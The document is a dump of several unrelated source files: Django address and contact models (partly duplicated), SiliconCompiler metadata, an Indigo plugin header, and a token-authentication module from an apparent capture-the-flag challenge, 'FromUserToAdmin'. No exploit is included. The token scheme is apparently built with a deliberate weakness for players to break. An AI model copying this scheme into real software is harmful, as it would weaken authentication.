list_display = ('zipcode','town','street','building','extention')
def __unicode__(self):
loc_str = u""
if self.zipcode:
loc_str = loc_str + u"%s" % self.zipcode
if self.town:
if not self.town.is_region_centre and self.town.district:
loc_str = loc_str + u", %s" % self.town.region
if not self.town.is_district_centre and self.town.district:
loc_str = loc_str + u", %s" % (self.town.district,)
loc_str = u"%s, %s%s" % (loc_str, self.town.type, self.town)
for elem in (self.street, self.building):
if elem:
loc_str = loc_str + u", %s" % elem
return loc_str
class Address(models.Model):
location = models.ForeignKey(Location, verbose_name=_('Location'), blank=True, null=True)
place = models.CharField(max_length=15, blank=True)
createuser = models.ForeignKey(User, related_name='created_addresses', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_addresses', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Address')
verbose_name_plural = _('Addresses')
class Admin:
list_display = ('location', 'place')
def __unicode__(self):
if self.place:
return u"%s, %s" % (self.location, self.place)
else:
return u"%s" % self.location
class Client(models.Model):
content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
object_id = models.PositiveIntegerField()
is_facture_required = models.BooleanField(_('Is Facture Required?')) #FIXME:, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_clients', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_clients', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
content_object = generic.GenericForeignKey()
def _name(self):
return u"%s" % self.content_object.name
name = property(_name)
class Meta:
verbose_name = _('Client')
verbose_name_plural = _('Clients')
class Admin:
list_display = ('id','name')
search_fields = ('id',)
def __unicode__(self):
return u"%s" % self.content_object
def setContentData(self, obj):
if obj:
#from django.contrib.contenttypes.models import ContentType
ct = ContentType.objects.filter(model__exact=obj._meta.module_name)
self.content_type = ct[0]
self.object_id = obj.id
def _getStaffList(client, as_choices=True):
obj_list = []
if client:
temp_list = client.content_object.employee_set.all()
if temp_list:
if as_choices:
obj_list = [(elem.person.fullname, elem.id) for elem in temp_list]
else:
obj_list = temp_list
return obj_list
getStaffList = staticmethod(_getStaffList)
def getInvoicesToBePaid(self):
obj_list = self.invoice_set.all().extra(where=['paym_complete is not True and wontbepaid is not True'])
return obj_list
class Person(models.Model):
firstname = models.CharField(_('First Name'), max_length=35) #, core=True)
middlename = models.CharField(_('Middle Name'), max_length=35, blank=True)
lastname = models.CharField(_('Last Name'), max_length=35)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
web = models.CharField(_('Web Site'), max_length=40, blank=True, null=True)
im = models.CharField(_('Instant Messenger'), max_length=40, blank=True, null=True)
info = models.TextField(_('Info'), blank=True)
createuser = models.ForeignKey(User, related_name='created_people', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_people', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
def _get_fullname(self):
return u"%s %s %s" % (self.lastname, self.firstname, self.middlename)
fullname = property(_get_fullname)
name = property(_get_fullname)
def _get_phone_list(self):
ct = ContentType.objects.get_for_model(self)
phones = PhoneList.objects.filter(content_type__id__exact=ct.id, object_id__exact=self.id)
return phones
phone_list = property(_get_phone_list)
def _get_employment_list(self):
employment = Employee.objects.filter(person__id__exact=self.id)
return employment
employment_list = property(_get_employment_list)
def _get_initials(self):
last = u""
first = u""
middle = u""
if self.lastname:
last = u"%s" % self.lastname
if self.firstname:
first = u"%s." % self.firstname[:2]
#first = self.firstname[0]
if self.firstname:
middle = u"%s." % self.middlename[:2]
#middle = self.middlename[0]
return u"%s %s%s" % (last, first, middle)
initials = property(_get_initials)
def get_phones(self):
phone_list = u""
for phone in self.phones.all():
phone_list = phone_list + u" %s" % phone
return phone_list
class Meta:
verbose_name = _('Person')
verbose_name_plural = _('People')
class Admin:
js = ('/site_media/js/tags.js',)
fields = (
(None, {'fields': ('lastname','firstname','middlename','town','info', 'web','email','im')}),
('Date information',{'classes':'collapse','fields':('createuser','modifyuser','createdate','modifydate')}),
)
list_display = ('fullname', 'get_phones', 'email', 'town', 'createuser', 'modifyuser')
search_fields = ('lastname', 'firstname', 'middlename', 'info')
def colored_name(self):
return '<span style="color: red;">%s</span>' % (self.lastname)
colored_name.allow_tags = True
def __unicode__(self):
last = u""
first = u""
middle = u""
if self.lastname:
last = u"%s" % self.lastname
if self.firstname:
first = u"%s" % self.firstname
if self.firstname:
middle = u"%s" % self.middlename
return u"%s %s %s" % (last, first, middle)
class Orgtype(models.Model):
code = models.CharField(_('Orgtype Code'), max_length=10)
name = models.CharField(_('Orgtype Name'), max_length=60)
createuser = models.ForeignKey(User, related_name='created_orgtypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_orgtypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Org Type')
verbose_name_plural = _('Org Types')
class Admin:
fields = (
(None, {'fields': ('code','name', )}),
)
def __unicode__(self):
return u"%s" % self.code
class Org(models.Model):
type = models.ForeignKey(Orgtype, blank=True, null=True, verbose_name=_('Org Type'))
code = models.CharField(_('Org Code'), max_length=15, blank=True)
alias = models.CharField(_('Org Alias'), max_length=100, blank=True)
name = models.CharField(_('Org Name'), max_length=200,blank=True)
fullname = models.CharField(_('Org Full Name'), max_length=200,blank=True)
#org_parentref = models.ForeignKey('self', null=True, blank=True)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
#phones = PhonesField(Phone, blank=True)
email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
http = models.CharField(_('Web Site'), max_length=40,blank=True)
info = models.TextField(_('Info'), max_length=256, blank=True, help_text='Rich Text Editing.')
contacted = models.DateField(blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_orgs', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_orgs', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
class Meta:
verbose_name = _('Organization')
verbose_name_plural = _('Organizations')
class Admin:
js = ('/site_media/js/tags.js',)
fields = (
(None, {'fields': ('type', 'code', 'alias', 'name', 'fullname', 'town', 'email', 'http', 'info', 'contacted')}),
('Date information', {'classes': 'collapse', 'fields': ('createuser', 'modifyuser', 'createdate', 'modifydate')}),
)
list_display = ('code', 'name', 'get_phones', 'email', 'createuser', 'modifyuser')
search_fields = ['code', 'alias', 'name', 'fullname', 'email', 'info']
def __unicode__(self):
return u"%s" % self.name
def get_phones(self):
phone_list = u""
for phone in self.phones.all():
phone_list = phone_list + u" %s" % phone
return phone_list
def _is_client(self):
if self.client_set.count():
return True
else:
return False
is_client = property(_is_client)
def getShortLegalName(self):
if self.type:
legal_name = u"%s %s" % (self.type, self.name)
else:
legal_name = u"%s" % self.name
return legal_name
#admin.site.register(Person)
|
#
#
#
from string import find
from django.db import models
#from django.core import validators
#from django.core.validators import isValidEmail
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib import admin
from django.contrib.auth.models import User
from serpantin.dojoforms import *
class Country(models.Model):
#addr_code = models.CharField(_('Street Code'), max_length=6)
name = models.CharField(_('Country Name'), max_length=100)
createuser = models.ForeignKey(User, related_name='created_countries', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_countries', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('name',)
class Admin:
fields = (
(None, {'fields': ('name',)}),
)
list_display = ('name',)
def __unicode__(self):
return self.name
class Region(models.Model):
country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
#FIXME: shortname is too short
#shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True)
name = models.CharField(_('Region Name'), max_length=100, unique=True)
createuser = models.ForeignKey(User, related_name='created_regions', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_regionss', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Region')
verbose_name_plural = _('Regions')
class Admin:
fields = (
(None, {'fields': ('name',)}),
)
list_display = ('name',)
def __unicode__(self):
return self.name
class District(models.Model):
name = models.CharField(_('District Name'), max_length=60, blank=True)
region = models.ForeignKey(Region, verbose_name=_('Region Name'), blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_districts', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_districts', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('District')
verbose_name_plural = _('Districts')
unique_together = (('name', 'region'), )
class Admin:
list_display = ('name',)
search_fields = ['name',]
def __unicode__(self):
return u"%s" % (self.name,)
class TownType(models.Model):
shortname = models.CharField(max_length=5, blank=True, null=True)
name = models.CharField(max_length=60, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_towntypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_towntypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('TownType')
verbose_name_plural = _('TownTypes')
class Admin:
pass
def __unicode__(self):
return u"%s" % self.shortname
class Town(models.Model):
#code = models.CharField(_('Town Code'), max_length=6)
country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
region = models.ForeignKey(Region, blank=True, null=True, verbose_name=_('Region'))
district = models.ForeignKey(District, blank=True, null=True, verbose_name=_('District'))
type = models.ForeignKey(TownType, verbose_name=_('Type'), blank=True, null=True)
name = models.CharField(_('Town Name'), max_length=35)
is_region_centre = models.BooleanField(_('IRC?')) #Is Region Centre?
is_district_centre = models.BooleanField(_('IDC?')) #Is District Centre?
createuser = models.ForeignKey(User, related_name='created_towns', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_towns', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
def __unicode__(self):
return self.name
class Meta:
verbose_name = _('Town')
verbose_name_plural = _('Towns')
ordering = ('name',)
class Admin:
list_display = ('type','name','region','district','is_region_centre','is_district_centre')
#js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'),
list_filter = ['createdate']
search_fields = ['name',]
class StreetType(models.Model):
shortname = models.CharField(max_length=5, blank=True, null=True)
name = models.CharField(max_length=60, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_streettypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_streettypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('StreetType')
verbose_name_plural = _('StreetTypes')
class Admin:
pass
def __unicode__(self):
return u"%s" % self.shortname
class Street(models.Model):
#addr_code = models.CharField(_('Street Code'), max_length=6)
name = models.CharField(_('Street Name'), max_length=100)
#type = models.ForeignKey(StreetType, null=True)
createuser = models.ForeignKey(User, related_name='created_streets', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_streets', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Street')
verbose_name_plural = _('Streets')
ordering = ('name',)
class Admin:
list_display = ('name',)
def __unicode__(self):
return u"%s" % self.name
PHONE_CHOICES = (
('P', _('City Number')),
('F', _('Fax Number')),
('M', _('Mobile Number')),
)
class Phone(models.Model):
type = models.CharField(_('Phone Type'), max_length=1, choices=PHONE_CHOICES)
number = models.CharField(_('Phone Number'), unique=True, max_length=30)
createuser = models.ForeignKey(User, related_name='created_phones', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_phones', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Phone')
verbose_name_plural = _('Phones')
class Admin:
list_display = ('type','number','createuser')
search_fields = ['number',]
def __unicode__(self):
return u"%s %s" % (self.type, self.number)
class PhoneList(models.Model):
number = models.ForeignKey(Phone, verbose_name=_('Phone Number'))
content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
object_id = models.IntegerField()
createuser = models.ForeignKey(User, related_name='created_phonelist', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_phonelist', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
content_object = generic.GenericForeignKey()
class Meta:
verbose_name = _('Phone List')
verbose_name_plural = _('Phone Lists')
class Admin:
list_display = ('number','content_type','object_id','createuser')
def __unicode__(self):
return u"%s" % (self.number)
class Addresstype(models.Model):
shortname = models.CharField(_('Addresstype Short Name'), max_length=20, unique=True)
name = models.CharField(_('Addresstype Name'), max_length=40)
createuser = models.ForeignKey(User, related_name='created_addresstype', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_addresstype', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Address Type')
verbose_name_plural = _('Address Types')
class Admin:
list_display = ('shortname','name','createuser')
def __unicode__(self):
return u"%s" % (self.shortname)
class Location(models.Model):
zipcode = models.CharField(_('Zipcode'), max_length=10, blank=True)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
town_aux = models.ForeignKey(Town, related_name='town_aux', blank=True, null=True, verbose_name=_('Town (Aux.)'))
street = models.ForeignKey(Street, blank=True, null=True, verbose_name=_('Street'))
building = models.CharField(_('Building'), max_length=35, blank=True)
extention = models.TextField(_('Extention'), blank=True)
createuser = models.ForeignKey(User, related_name='created_locations', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_locations', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Location')
verbose_name_plural = _('Locations')
class Admin:
list_display = ('zipcode','town','street','building','extention')
def __unicode__(self):
loc_str = u""
if self.zipcode:
loc_str = loc_str + u"%s" % self.zipcode
if self.town:
if not self.town.is_region_centre and self.town.district:
loc_str = loc_str + u", %s" % self.town.region
if not self.town.is_district_centre and self.town.district:
loc_str = loc_str + u", %s" % (self.town.district,)
loc_str = u"%s, %s%s" % (loc_str, self.town.type, self.town)
for elem in (self.street, self.building):
if elem:
loc_str = loc_str + u", %s" % elem
return loc_str
class Address(models.Model):
location = models.ForeignKey(Location, verbose_name=_('Location'), blank=True, null=True)
place = models.CharField(max_length=15, blank=True)
createuser = models.ForeignKey(User, related_name='created_addresses', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_addresses', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Address')
verbose_name_plural = _('Addresses')
class Admin:
list_display = ('location', 'place')
def __unicode__(self):
if self.place:
return u"%s, %s" % (self.location, self.place)
else:
return u"%s" % self.location
class Client(models.Model):
content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
object_id = models.PositiveIntegerField()
is_facture_required = models.BooleanField(_('Is Facture Required?')) #FIXME:, blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_clients', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_clients', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
content_object = generic.GenericForeignKey()
def _name(self):
return u"%s" % self.content_object.name
name = property(_name)
class Meta:
verbose_name = _('Client')
verbose_name_plural = _('Clients')
class Admin:
list_display = ('id','name')
search_fields = ('id',)
def __unicode__(self):
return u"%s" % self.content_object
def setContentData(self, obj):
if obj:
#from django.contrib.contenttypes.models import ContentType
ct = ContentType.objects.filter(model__exact=obj._meta.module_name)
self.content_type = ct[0]
self.object_id = obj.id
def _getStaffList(client, as_choices=True):
obj_list = []
if client:
temp_list = client.content_object.employee_set.all()
if temp_list:
if as_choices:
obj_list = [(elem.person.fullname, elem.id) for elem in temp_list]
else:
obj_list = temp_list
return obj_list
getStaffList = staticmethod(_getStaffList)
def getInvoicesToBePaid(self):
obj_list = self.invoice_set.all().extra(where=['paym_complete is not True and wontbepaid is not True'])
return obj_list
class Person(models.Model):
firstname = models.CharField(_('First Name'), max_length=35) #, core=True)
middlename = models.CharField(_('Middle Name'), max_length=35, blank=True)
lastname = models.CharField(_('Last Name'), max_length=35)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
web = models.CharField(_('Web Site'), max_length=40, blank=True, null=True)
im = models.CharField(_('Instant Messenger'), max_length=40, blank=True, null=True)
info = models.TextField(_('Info'), blank=True)
createuser = models.ForeignKey(User, related_name='created_people', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_people', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
def _get_fullname(self):
return u"%s %s %s" % (self.lastname, self.firstname, self.middlename)
fullname = property(_get_fullname)
name = property(_get_fullname)
def _get_phone_list(self):
ct = ContentType.objects.get_for_model(self)
phones = PhoneList.objects.filter(content_type__id__exact=ct.id, object_id__exact=self.id)
return phones
phone_list = property(_get_phone_list)
def _get_employment_list(self):
employment = Employee.objects.filter(person__id__exact=self.id)
return employment
employment_list = property(_get_employment_list)
def _get_initials(self):
last = u""
first = u""
middle = u""
if self.lastname:
last = u"%s" % self.lastname
if self.firstname:
first = u"%s." % self.firstname[:2]
#first = self.firstname[0]
if self.firstname:
middle = u"%s." % self.middlename[:2]
#middle = self.middlename[0]
return u"%s %s%s" % (last, first, middle)
initials = property(_get_initials)
def get_phones(self):
phone_list = u""
for phone in self.phones.all():
phone_list = phone_list + u" %s" % phone
return phone_list
class Meta:
verbose_name = _('Person')
verbose_name_plural = _('People')
class Admin:
js = ('/site_media/js/tags.js',)
fields = (
(None, {'fields': ('lastname','firstname','middlename','town','info', 'web','email','im')}),
('Date information',{'classes':'collapse','fields':('createuser','modifyuser','createdate','modifydate')}),
)
list_display = ('fullname', 'get_phones', 'email', 'town', 'createuser', 'modifyuser')
search_fields = ('lastname', 'firstname', 'middlename', 'info')
def colored_name(self):
return '<span style="color: red;">%s</span>' % (self.lastname)
colored_name.allow_tags = True
def __unicode__(self):
last = u""
first = u""
middle = u""
if self.lastname:
last = u"%s" % self.lastname
if self.firstname:
first = u"%s" % self.firstname
if self.firstname:
middle = u"%s" % self.middlename
return u"%s %s %s" % (last, first, middle)
class Orgtype(models.Model):
code = models.CharField(_('Orgtype Code'), max_length=10)
name = models.CharField(_('Orgtype Name'), max_length=60)
createuser = models.ForeignKey(User, related_name='created_orgtypes', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_orgtypes', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
class Meta:
verbose_name = _('Org Type')
verbose_name_plural = _('Org Types')
class Admin:
fields = (
(None, {'fields': ('code','name', )}),
)
def __unicode__(self):
return u"%s" % self.code
class Org(models.Model):
type = models.ForeignKey(Orgtype, blank=True, null=True, verbose_name=_('Org Type'))
code = models.CharField(_('Org Code'), max_length=15, blank=True)
alias = models.CharField(_('Org Alias'), max_length=100, blank=True)
name = models.CharField(_('Org Name'), max_length=200,blank=True)
fullname = models.CharField(_('Org Full Name'), max_length=200,blank=True)
#org_parentref = models.ForeignKey('self', null=True, blank=True)
town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
#phones = PhonesField(Phone, blank=True)
email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
http = models.CharField(_('Web Site'), max_length=40,blank=True)
info = models.TextField(_('Info'), max_length=256, blank=True, help_text='Rich Text Editing.')
contacted = models.DateField(blank=True, null=True)
createuser = models.ForeignKey(User, related_name='created_orgs', blank=True, null=True)
createdate = models.DateTimeField(blank=True, auto_now_add=True)
modifyuser = models.ForeignKey(User, related_name='modified_orgs', blank=True, null=True)
modifydate = models.DateTimeField(blank=True, auto_now=True)
clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
class Meta:
verbose_name = _('Organization')
verbose_name_plural = _('Organizations')
class Admin:
js = ('/site_media/js/tags.js',)
fields = (
(None, {'fields': ('type', 'code', 'alias', 'name', 'fullname', 'town', 'email', 'http', 'info', 'contacted')}),
('Date information', {'classes': 'collapse', 'fields': ('createuser', 'modifyuser', 'createdate', 'modifydate')}),
)
list_display = ('code', 'name', 'get_phones', 'email', 'createuser', 'modifyuser')
search_fields = ['code', 'alias', 'name', 'fullname', 'email', 'info']
def __unicode__(self):
return u"%s" % self.name
def get_phones(self):
phone_list = u""
for phone in self.phones.all():
phone_list = phone_list + u" %s" % phone
return phone_list
def _is_client(self):
if self.client_set.count():
return True
else:
return False
is_client = property(_is_client)
def getShortLegalName(self):
if self.type:
legal_name = u"%s %s" % (self.type, self.name)
else:
legal_name = u"%s" % self.name
return legal_name
#admin.site.register(Person)
|
en
| 0.235892
|
# # # #from django.core import validators #from django.core.validators import isValidEmail #addr_code = models.CharField(_('Street Code'), max_length=6) #FIXME: shortname is too short #shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True) #code = models.CharField(_('Town Code'), max_length=6) #Is Region Centre? #Is District Centre? #js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'), #addr_code = models.CharField(_('Street Code'), max_length=6) #type = models.ForeignKey(StreetType, null=True) #FIXME:, blank=True, null=True) #from django.contrib.contenttypes.models import ContentType #, core=True) #FIXME:, validator_list=[isValidEmail]) #, verbose_name=_('Client'), blank=True, null=True) #first = self.firstname[0] #middle = self.middlename[0] #org_parentref = models.ForeignKey('self', null=True, blank=True) #phones = PhonesField(Phone, blank=True) #FIXME:, validator_list=[isValidEmail]) #, verbose_name=_('Client'), blank=True, null=True) #admin.site.register(Person)
| 1.93815
| 2
|
siliconcompiler/_metadata.py
|
mfkiwl/siliconcompiler
| 0
|
6627640
|
# Version number following semver standard.
version = '0.5.0'
# This is the list of significant contributors to SiliconCompiler in
# chronological order.
#
# This does not necessarily list everyone who has contributed code,
# especially since many employees of one corporation may be contributing.
# To see the full list of contributors, see the git revision history
authors = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
# CLI entry banner autogenerated using pyfiglet.
# >> pyfiglet.figlet_format("Silicon Compiler")
banner = '''
____ _ _ _ ____ _ _
/ ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __
\___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__|
___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ |
|____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_|
|_|
'''
|
# Version number following semver standard.
version = '0.5.0'
# This is the list of significant contributors to SiliconCompiler in
# chronological order.
#
# This does not necessarily list everyone who has contributed code,
# especially since many employees of one corporation may be contributing.
# To see the full list of contributors, see the git revision history
authors = [
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>'
]
# CLI entry banner autogenerated using pyfiglet.
# >> pyfiglet.figlet_format("Silicon Compiler")
banner = '''
____ _ _ _ ____ _ _
/ ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __
\___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__|
___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ |
|____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_|
|_|
'''
|
en
| 0.636025
|
# Version number following semver standard. # This is the list of significant contributors to SiliconCompiler in # chronological order. # # This does not necessarily list everyone who has contributed code, # especially since many employees of one corporation may be contributing. # To see the full list of contributors, see the git revision history # CLI entry banner autogenerated using pyfiglet. # >> pyfiglet.figlet_format("Silicon Compiler") ____ _ _ _ ____ _ _ / ___|(_) (_) ___ ___ _ __ / ___|___ _ __ ___ _ __ (_) | ___ _ __ \___ \| | | |/ __/ _ \| '_ \ | | / _ \| '_ ` _ \| '_ \| | |/ _ \ '__| ___) | | | | (_| (_) | | | | | |__| (_) | | | | | | |_) | | | __/ | |____/|_|_|_|\___\___/|_| |_| \____\___/|_| |_| |_| .__/|_|_|\___|_| |_|
| 1.340054
| 1
|
Pwnable/200-FromUserToAdmin/src/authentication.py
|
Probely/CTF-Challenges
| 42
|
6627641
|
import time
import struct
import base64
import crypto
import settings
BOX = crypto.Toolbox(settings.EKEY, settings.AKEY)
MAX_USER_LEN = 12
MAX_TOKEN_LEN = 16
USER_PADDING = '\0'
def generate_token(username, ttl=7200):
# A token is a base64-encoded, encrypted, binary structure as follows:
# [padded username (12 bytes)][time to live (4 byte big-endian integer)]
#
# Example for username "user":
# 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
# Example for username "admin":
# 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
until = int(time.time()) + ttl
until_bytes = struct.pack('>I', until)
# Truncate user to MAX_USER_LEN bytes
username = username[:MAX_USER_LEN]
# Pad it, if required
delta = MAX_USER_LEN - len(username)
if delta > 0:
username += '\0' * delta
plaintext = username + until_bytes
ciphertext = BOX.encrypt(plaintext)
token = base64.urlsafe_b64encode(ciphertext)
return token
def verify_token(token):
try:
ciphertext = base64.urlsafe_b64decode(token)
except (AttributeError, ValueError, TypeError):
return None
plaintext = BOX.decrypt(ciphertext)
if plaintext is None or len(plaintext) != MAX_TOKEN_LEN:
return None
try:
user, _ = plaintext.split('\0', 1)
except (AttributeError, ValueError, TypeError):
return None
until_bytes = plaintext[-4:]
try:
until = struct.unpack('>I', until_bytes)
except (AttributeError, ValueError, TypeError):
return None
else:
until = until[0]
now = int(time.time())
if now < until:
return user
else:
return None
|
import time
import struct
import base64
import crypto
import settings
BOX = crypto.Toolbox(settings.EKEY, settings.AKEY)
MAX_USER_LEN = 12
MAX_TOKEN_LEN = 16
USER_PADDING = '\0'
def generate_token(username, ttl=7200):
# A token is a base64-encoded, encrypted, binary structure as follows:
# [padded username (12 bytes)][time to live (4 byte big-endian integer)]
#
# Example for username "user":
# 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
# Example for username "admin":
# 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9'
until = int(time.time()) + ttl
until_bytes = struct.pack('>I', until)
# Truncate user to MAX_USER_LEN bytes
username = username[:MAX_USER_LEN]
# Pad it, if required
delta = MAX_USER_LEN - len(username)
if delta > 0:
username += '\0' * delta
plaintext = username + until_bytes
ciphertext = BOX.encrypt(plaintext)
token = base64.urlsafe_b64encode(ciphertext)
return token
def verify_token(token):
try:
ciphertext = base64.urlsafe_b64decode(token)
except (AttributeError, ValueError, TypeError):
return None
plaintext = BOX.decrypt(ciphertext)
if plaintext is None or len(plaintext) != MAX_TOKEN_LEN:
return None
try:
user, _ = plaintext.split('\0', 1)
except (AttributeError, ValueError, TypeError):
return None
until_bytes = plaintext[-4:]
try:
until = struct.unpack('>I', until_bytes)
except (AttributeError, ValueError, TypeError):
return None
else:
until = until[0]
now = int(time.time())
if now < until:
return user
else:
return None
|
en
| 0.285723
|
# A token is a base64-encoded, encrypted, binary structure as follows: # [padded username (12 bytes)][time to live (4 byte big-endian integer)] # # Example for username "user": # 'user\x00\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9' # Example for username "admin": # 'admin\x00\x00\x00\x00\x00\x00\x00W\xea\xae\xd9' # Truncate user to MAX_USER_LEN bytes # Pad it, if required
| 2.801836
| 3
|
Roku Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
|
RogueProeliator/IndigoPlugins-Roku-Network-Remote
| 1
|
6627642
|
<reponame>RogueProeliator/IndigoPlugins-Roku-Network-Remote<filename>Roku Network Remote.indigoPlugin/Contents/Server Plugin/RPFramework/RPFrameworkRESTfulDevice.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#/////////////////////////////////////////////////////////////////////////////////////////
#/////////////////////////////////////////////////////////////////////////////////////////
# RPFrameworkRESTfulDevice by RogueProeliator <<EMAIL>>
# This class is a concrete implementation of the RPFrameworkDevice as a device which
# communicates via a REST style HTTP connection.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
